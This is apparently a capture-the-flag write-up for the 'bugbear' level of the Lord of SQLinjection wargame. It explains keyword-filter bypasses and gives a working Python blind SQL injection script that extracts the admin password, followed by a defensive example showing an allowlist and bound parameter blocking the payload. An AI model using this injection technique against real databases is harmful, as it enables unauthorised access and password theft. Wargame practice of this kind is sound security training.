
Lord of SQLinjection - bugbear

by Janger 2021. 12. 7.

This time, in addition to whitespace and OR/AND, LIKE is filtered as well.

Whitespace can be replaced with %0a, and LIKE can be replaced with IN.

While working on the injection I tried to use the ORD function, but it could not be used because it contains the OR keyword.

So, having no other choice, I used HEX in place of ORD and added the CONV function to convert the hexadecimal value to decimal. With only that change, the script is similar to the earlier automation source.

import requests

# Session cookie for the wargame site
cookie = {'PHPSESSID': 'enter your own cookie value'}

base_url = "https://los.rubiya.kr/chall/bugbear_19ebf8c8106a5323825b5dfa1b07ac1f.php"
solve = ""

# Walk positions 1 through 8 of pw, one character at a time
for i in range(1, 8 + 1):
    # Candidate character codes 48..112
    for code in range(48, 112 + 1):
        print(code)
        # CONV(HEX(...),16,10) stands in for ORD(); IN replaces LIKE; %26%26 is &&, %23 is #
        parameter = "?pw=NULL&&no=0||id in(\"admin\") %26%26 CONV(HEX(MID(pw,{},1)),16,10) IN ({})%23".format(i, code)
        # Spaces are filtered, so send them as %0a
        parameter = parameter.replace(" ", "%0a")
        url = base_url + parameter
        result = requests.get(url=url, cookies=cookie).text
        if "Hello admin" in result:
            print(i, code, chr(code))
            solve += chr(code)
            break

print(solve)
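The filter behaviour described above, seen from the defending side, as an added example that is not part of the original post or the challenge's source. The blacklist is an assumption rebuilt from the post's description, and the `member` table, its rows and all function names are constructed; it shows the substring check rejecting `ORD` while passing the post's `HEX`/`CONV` form, and an integer allowlist with a bound parameter rejecting both.

```python
import re
import sqlite3

# Assumed filter, rebuilt from the post's description (space, OR, AND, LIKE
# rejected as case-insensitive substrings); not the challenge's real source.
BLACKLIST = re.compile(r" |or|and|like", re.IGNORECASE)

# The post's `no` value for position 1 / code 48, after URL decoding
# (%0a -> newline, %26%26 -> &&, %23 -> #).
POST_PAYLOAD = '0||id\nin("admin")\n&&\nCONV(HEX(MID(pw,1,1)),16,10)\nIN\n(48)#'


def blacklist_allows(value: str) -> bool:
    """True when the keyword blacklist lets the value through."""
    return BLACKLIST.search(value) is None


def make_db() -> sqlite3.Connection:
    """Constructed sample table (hypothetical name and rows)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE member (no INTEGER, id TEXT, pw TEXT)")
    db.executemany(
        "INSERT INTO member VALUES (?, ?, ?)",
        [(1, "guest", "guest"), (2, "admin", "constructed-secret")],
    )
    return db


def lookup_hardened(db: sqlite3.Connection, no: str):
    """Allowlist `no` as a plain decimal integer, then bind it as a parameter."""
    if not re.fullmatch(r"[0-9]{1,9}", no):
        return None  # anything other than digits never reaches the query
    row = db.execute("SELECT id FROM member WHERE no = ?", (int(no),)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    samples = {"1": "1", "ORD form": "ORD(MID(pw,1,1))", "post payload": POST_PAYLOAD}
    for label, value in samples.items():
        print(f"{label:13} blacklist_allows={blacklist_allows(value)!s:5} "
              f"hardened={lookup_hardened(db, value)}")
```
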

 

 

 

Reference:

https://stackoverflow.com/questions/15085858/convert-hex-column-to-dec-in-mysql

 
